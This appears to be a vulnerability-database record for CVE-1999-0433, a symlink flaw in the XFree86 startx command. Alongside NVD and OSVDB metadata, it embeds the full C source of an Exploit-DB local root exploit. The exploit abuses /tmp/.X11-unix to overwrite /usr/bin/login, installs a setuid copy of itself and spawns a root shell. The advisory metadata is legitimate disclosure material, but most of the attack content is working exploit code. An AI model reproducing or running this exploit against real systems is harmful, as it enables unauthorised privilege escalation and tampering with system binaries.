ID: CVE-1999-0433
Type: cve
Reporter: NVD
Modified: 2008-09-09T08:34:31
Description
XFree86 startx command is vulnerable to a symlink attack, allowing local users to create files in restricted directories, possibly allowing them to gain privileges or cause a denial of service.
{"href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0433", "history": [], "references": [], "lastseen": "2016-09-03T02:13:59", "bulletinFamily": "NVD", "title": "CVE-1999-0433", "cpe": ["cpe:/o:redhat:linux:5.1", "cpe:/o:slackware:slackware_linux:3.3", "cpe:/o:netbsd:netbsd:1.3.2", "cpe:/o:slackware:slackware_linux:3.6", "cpe:/o:slackware:slackware_linux:4.0", "cpe:/o:slackware:slackware_linux:3.5", "cpe:/o:redhat:linux:5.2::i386", "cpe:/a:xfree86_project:x11r6:3.3.3", "cpe:/o:slackware:slackware_linux:3.4", "cpe:/o:netbsd:netbsd:1.3.3", "cpe:/o:suse:suse_linux:5.2", "cpe:/o:suse:suse_linux:6.1", "cpe:/o:suse:suse_linux:5.1", "cpe:/o:suse:suse_linux:6.0"], "viewCount": 4, "id": "CVE-1999-0433", "hash": "2264afc596ef7bb8c6052a96d5f9cc5c26925aa8e0988e5bbb79900cb431591c", "description": "XFree86 startx command is vulnerable to a symlink attack, allowing local users to create files in restricted directories, possibly allowing them to gain privileges or cause a denial of service.", "edition": 1, "assessment": {"name": "", "href": "", "system": ""}, "cvelist": ["CVE-1999-0433"], "scanner": [], "modified": "2008-09-09T08:34:31", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "objectVersion": "1.2", "reporter": "NVD", "type": "cve", "published": "1999-03-21T00:00:00", "enchantments": {"score": {"value": 7.2, "vector": "NONE", "modified": "2016-09-03T02:13:59"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:19257"]}, {"type": "osvdb", "idList": ["OSVDB:975"]}], "modified": "2016-09-03T02:13:59"}, "vulnersScore": 7.2}}
{"exploitdb": [{"lastseen": "2016-02-02T11:24:33", "bulletinFamily": "exploit", "description": "X11R6 3.3.3 Symlink Vulnerability. CVE-1999-0433. Local exploit for linux platform", "modified": "1999-03-21T00:00:00", "published": "1999-03-21T00:00:00", "id": "EDB-ID:19257", "href": "https://www.exploit-db.com/exploits/19257/", "type": "exploitdb", "title": "X11R6 3.3.3 Symlink Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/326/info\r\n\r\nThere is a symlink vulnerability known to exist under most modern linux and NetBSD distributions. It involves /tmp/.X11-unix and the tendency to follow to/overwrite the file pointed to if a symlink. It may be possible for a regular user to write arbritrary data to a file they normally have no write access to resulting in a root compromise. \r\n\r\n/*** local XFree 3.3.3-symlink root-compromise.\r\n *** Tested under FreeBSD 3.1 (but should work on others 2)\r\n *** (C) 1999/2000 by Stealthf0rk for the K.A.L.U.G. \r\n *** (check out http://www.kalug.lug.net/stealth or /coding for\r\n *** other kewl stuff!)\r\n ***\r\n *** FOR EDUCATIONAL PURPOSES ONLY!!! 
USE IT AT YOUR OWN RISK.\r\n *** Even if this program restores all, you should backup your\r\n *** login before running this.\r\n ***/\r\n\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <errno.h>\r\n#include <fcntl.h>\r\n\r\n#define LOGIN \"/usr/bin/login\"\r\n#define TELNET \"/usr/bin/telnet\"\r\n\r\nint cp(const char*, const char*, int);\r\n\r\nint main(int argc, char **argv)\r\n{\r\n\r\n\tchar *telnet[] = {TELNET, \"localhost\", NULL};\r\n\tchar *shell[] = {\"/bin/sh\", NULL};\r\n\tchar *X[] = {\"/usr/X11R6/bin/xinit\", NULL};\r\n\tFILE *f = NULL;\r\n\tint p = 0;\r\n\tchar buf[1000] = {0};\r\n\r\n\t/* the rootshell */\r\n\tif (!geteuid() || !getuid()) {\r\n\t\tunlink(LOGIN);\r\n\t\tcp(\"/tmp/L\", LOGIN, 1);\r\n\t\tchmod(LOGIN, 04555);\r\n\t\tprintf(\"Welcome!\\n\");\r\n\t\tunlink(\"/tmp/.X11-unix\");\r\n\t\tunlink(\"/tmp/L\");\r\n\t\texecve(*shell, shell, NULL);\r\n\t}\r\n\t\r\n\t/* back up */\r\n\tcp(LOGIN, \"/tmp/L\", 1);\r\n\tif (symlink(LOGIN, \"/tmp/.X11-unix\") < 0) {\r\n\t\tperror(\"symlink (/tmp/.X11-unix)\");\r\n\t\texit(errno);\r\n\t}\r\n\tif ((p = fork()) < 0) {\r\n\t\tperror(\"fork\");\r\n\t\texit(errno);\r\n\t} else if (p > 0) {\r\n\t\tsleep(7);\r\n\t\tkill(p, 9);\r\n\t\tcp(argv[0], LOGIN, 1);\r\n\t\texecve(telnet[0], telnet, NULL);\r\n\t\tperror(\"fatal:\");\r\n\t} else {\r\n\t\tprintf(\"Xfree 3.3.3 root-sploit by Stealth. http://www.kalug.lug.net\\n\");\r\n\t\tprintf(\"\\n-> Please give me some seconds... <-\\n\\n\");\r\n\t\texecve(X[0], X, NULL);\r\n\t}\r\n\treturn 0;\r\n}\r\n\t\r\n\t\r\nint cp(const char *from, const char *to, int how)\r\n{\r\n\tint in = 0, out = 0, r = 0;\r\n\tchar buf[1000] = {0};\r\n\t\r\n\r\n\tprintf(\"cp %s %s\\n\", from, to);\r\n\t/* overwrite ? 
*/\r\n\tif (how == 1) \r\n\t\thow = O_RDWR|O_TRUNC|O_CREAT;\r\n\telse\r\n\t\thow = O_RDWR|O_CREAT;\r\n\r\n if ((out = open(to, how)) < 0) {\r\n\t\tperror(\"open 1\");\r\n\t\texit(errno);\r\n\t}\r\n\tif ((in = open(from, O_RDONLY)) < 0) {\r\n\t\tperror(\"open 2\");\r\n\t\texit(errno);\r\n\t}\r\n\twhile ((r = read(in, buf, 1000-1)) > 0) {\r\n\t\twrite(out,buf,r);\r\n\t\tmemset(buf,0,1000);\r\n\t}\r\n\tclose(in); close(out);\r\n\treturn 0;\r\n}\r\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/19257/"}], "osvdb": [{"lastseen": "2017-04-28T13:19:55", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nISS X-Force ID: 2032\n[CVE-1999-0433](https://vulners.com/cve/CVE-1999-0433)\nBugtraq ID: 326\n", "modified": "1999-03-28T00:00:00", "published": "1999-03-28T00:00:00", "id": "OSVDB:975", "href": "https://vulners.com/osvdb/OSVDB:975", "title": "X11R6 startx Symlink Arbitrary File Creation", "type": "osvdb", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}